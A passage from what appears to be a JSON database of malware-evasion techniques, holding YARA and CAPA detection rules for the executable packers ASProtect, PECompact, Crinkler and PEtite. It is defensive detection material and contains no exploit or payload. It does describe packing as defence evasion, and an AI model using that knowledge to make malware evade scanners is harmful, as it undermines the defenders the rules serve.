C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 
00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n        $c = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v21x: PEiD\r\n{\r\n    strings:\r\n        $a = { BB E9 60 9C FC BF B9 F3 AA 9D 61 C3 55 8B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule AHTeam_EP_Protector_03_fake_ASProtect_10_FEUERRADER: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 
90 FF E0 60 E8 01 00 00 00 90 5D 81 ED 00 00 00 00 BB 00 00 00 00 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E9 ?? 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_20: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B ?? ?? ?? E9 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEb: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B E9 }\r\n        $b = { 90 60 E9 ?? 
04 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_20_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_BRS_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 
05 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 00 00 00 E8 83 C4 04 E8 01 00 00 00 E9 5D 81 ED D3 22 40 00 E8 04 02 00 00 E8 EB 08 EB 02 CD 20 FF 24 24 9A 66 BE 47 46 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v10: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 01 ?? ?? ?? 90 5D 81 ED ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 ?? ?? E9 ?? ?? ?? ?? ?? ?? ?? 
EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 C3 AA ?? }\r\n        $b = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 
00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_11_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 04 00 00 E9 ?? ?? ?? ?? ?? ?? ?? EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_130824_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTEc_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 BE ?? ?? 8B D8 B9 ?? ?? BF ?? ?? BA ?? ?? 47 4A 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_exe_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_133_21_Registered_Alexey_Solodovnikov_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_21x_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 
80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 F0 58 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_ASProtect_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_122_123_Beta_21_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 E0 46 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_MTE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? 91 78 79 79 79 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 195,
            "unprotect_id": "U1414",
            "name": "PECompact",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PECompact is a Windows executable compressor. It has a plugin system that offers virtually unlimited customization.",
            "resources": "https://bitsum.com/portfolio/pecompact/",
            "tags": "pecompact",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 97,
                    "key": "capa_detect_pecompact",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_PeCompact",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with PECompact\r\n    namespace: anti-analysis/packer/pecompact\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - Practical Malware Analysis Lab 18-03.exe_\r\n  features:\r\n    - or:\r\n      - section: PEC2TO\r\n      - section: PEC2\r\n      - section: pec\r\n      - section: pec1\r\n      - section: pec2\r\n      - section: pec3\r\n      - section: pec4\r\n      - section: pec5\r\n      - section: pec6\r\n      - section: PEC2MO"
                }
            ]
        },
        {
            "id": 194,
            "unprotect_id": "U1413",
            "name": "Crinkler",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Crinkler is a compressing linker for Windows, specifically targeted towards executables with a size of just a few kilobytes.",
            "resources": "https://github.com/runestubbe/Crinkler",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 111,
                    "key": "yara_detect_crinkler",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Crinkler",
                    "rule": "rule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 00 00 00 00 58 25 00 F0 FF FF 33 FF 66 BB 19 5A 66 83 C3 34 66 39 18 75 12 0F B7 50 3C 03 D0 BB E9 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V01_V02_Rune_LHStubbe_and_Aske_Simon_Christensen_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Crinkler_V03_V04_Rune_LHStubbe_and_Aske_Simon_Christensen: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 42 00 31 DB 43 EB 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 193,
            "unprotect_id": "U1412",
            "name": "PEtite",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Petite is a free Win32 (Windows 95/98/2000/NT/XP/Vista/7/etc) executable (EXE/DLL/etc) compressor. The compressed executables decompress themselves at run time and can be used just like the original non-compressed versions. \r\n\r\nPetite also adds virus detection to the compressed executables; they will check themselves for infection every time they are executed.",
            "resources": "https://www.un4seen.com/petite/",
            "tags": "petite",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 99,
                    "key": "capa_detect_petite",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Petite",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with petite\r\n    namespace: anti-analysis/packer/petite\r\n    authors:\r\n      - \"@_re_fox\"\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 2a7429d60040465f9bd27bbae2beef88\r\n  features:\r\n    - or:\r\n      - section: .petite"
                },
                {
                    "id": 110,
                    "key": "yara_detect_petite",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Petite",
                    "rule": "rule PEtite_v20_Ian_Luck: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A 00 FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_PEtite_21_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 50 40 00 6A 00 68 BB 21 40 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 83 C4 04 61 66 9D 64 8F 05 00 00 00 00 83 C4 08 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PEtite_v22_wwwun4seencompetite: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_21: PEiD\r\n{\r\n    strings:\r\n        $a = { 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 66 9C 60 50 8B D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Petite_20: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 00 00 00 00 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 18 8B CC 8D A0 54 BC 00 00 8B C3 8D 90 E0 15 00 00 68 00 00 00 00 51 50 80 